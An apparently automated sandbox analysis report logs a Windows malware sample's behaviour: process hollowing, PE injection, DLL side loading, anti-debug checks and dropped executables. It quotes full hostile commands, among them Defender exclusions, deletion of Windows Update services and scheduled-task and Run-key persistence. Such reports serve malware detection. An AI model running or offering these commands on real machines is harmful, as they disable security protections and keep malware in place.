Source: C:\Users\user\Desktop\N2wufLmC74.exe

Code function: 0_2_013C14C0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_013C14C0

Source: C:\Users\user\Desktop\N2wufLmC74.exe

Code function: 0_2_0148116C mov eax, dword ptr fs:[00000030h]

0_2_0148116C

Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Google\brave.exe

Code function: 14_2_00007FF715BA6EE0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,

14_2_00007FF715BA6EE0

Source: C:\Users\user\AppData\Local\Google\brave.exe

Code function: 14_2_00007FF715BA6EE0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,

14_2_00007FF715BA6EE0

Source: C:\Users\user\AppData\Local\Google\brave.exe

Code function: 14_2_00007FF715B943C0 SHGetFolderPathW,GetFileSize,GetProcessHeap,HeapAlloc,RtlAllocateHeap,

14_2_00007FF715B943C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_013C1150 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,_cexit,exit,	0_2_013C1150
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 0_2_013C119B SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	0_2_013C119B
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 14_2_00007FF715B91190 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,malloc,memcpy,_initterm,GetStartupInfoW,exit,	14_2_00007FF715B91190

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Google\brave.exe

Section loaded: C:\Users\user\AppData\Local\Temp\8FB9.tmp target: unknown protection: readonly

Jump to behavior

Encrypted powershell cmdline option found

Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @('C:\Users\Revelin', 'C:\Program Files') -Force
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: Base64 decoded Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @('C:\Users\Revelin', 'C:\Program Files') -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: Base64 decoded Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\N2wufLmC74.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory allocated: C:\Windows\GoogleUpdate.exe base: 2D0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\zonewar.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\N2wufLmC74.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 2D0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\zonewar.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A

DLL side loading technique detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: C:\Users\user\AppData\LocalLow\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: C:\Users\user\AppData\LocalLow\mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: C:\Windows\SysWOW64\vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: C:\Windows\SysWOW64\msvcp140.dll

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\N2wufLmC74.exe

Code function: 0_2_014811A1 CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,

0_2_014811A1

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force			Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Google\chrome.exe	Section unmapped: C:\Windows\GoogleUpdate.exe base address: 2D0000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Section unmapped: C:\Windows\GoogleUpdate.exe base address: 2D0000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Section unmapped: unknown base address: 2D0000	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Section unmapped: unknown base address: 2D0000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\N2wufLmC74.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: F9F008	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Memory written: C:\Windows\System32\dialer.exe base: 44A961A010	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 2D0000
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 2D1000
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 2E1000
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 850000
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 852000
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Memory written: C:\Windows\GoogleUpdate.exe base: 85F000
Source: C:\Users\user\AppData\Local\Temp\zonewar.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\zonewar.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 8A7008

.NET source code references suspicious native API functions

Source: 0.3.N2wufLmC74.exe.a00000.0.unpack, MemoryImport.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
Source: conchsvt.exe.2.dr, opportunity/thin.cs	Reference to suspicious API methods: ('customer', 'ReadProcessMemory@kernel32.dll'), ('era', 'OpenProcess@kernel32.dll')
Source: 12.0.conchsvt.exe.510000.0.unpack, opportunity/thin.cs	Reference to suspicious API methods: ('customer', 'ReadProcessMemory@kernel32.dll'), ('era', 'OpenProcess@kernel32.dll')

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Google\brave.exe

Thread register set: target process: 5708

Jump to behavior

Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }	Jump to behavior

Source: C:\Users\user\Desktop\N2wufLmC74.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\brave.exe "C:\Users\user\AppData\Local\Google\brave.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\ofg.exe "C:\Users\user\AppData\Local\Google\ofg.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\chrome.exe "C:\Users\user\AppData\Local\Google\chrome.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\zonewar.exe "C:\Users\user\AppData\Local\Temp\zonewar.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\zonewar.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: unknown unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
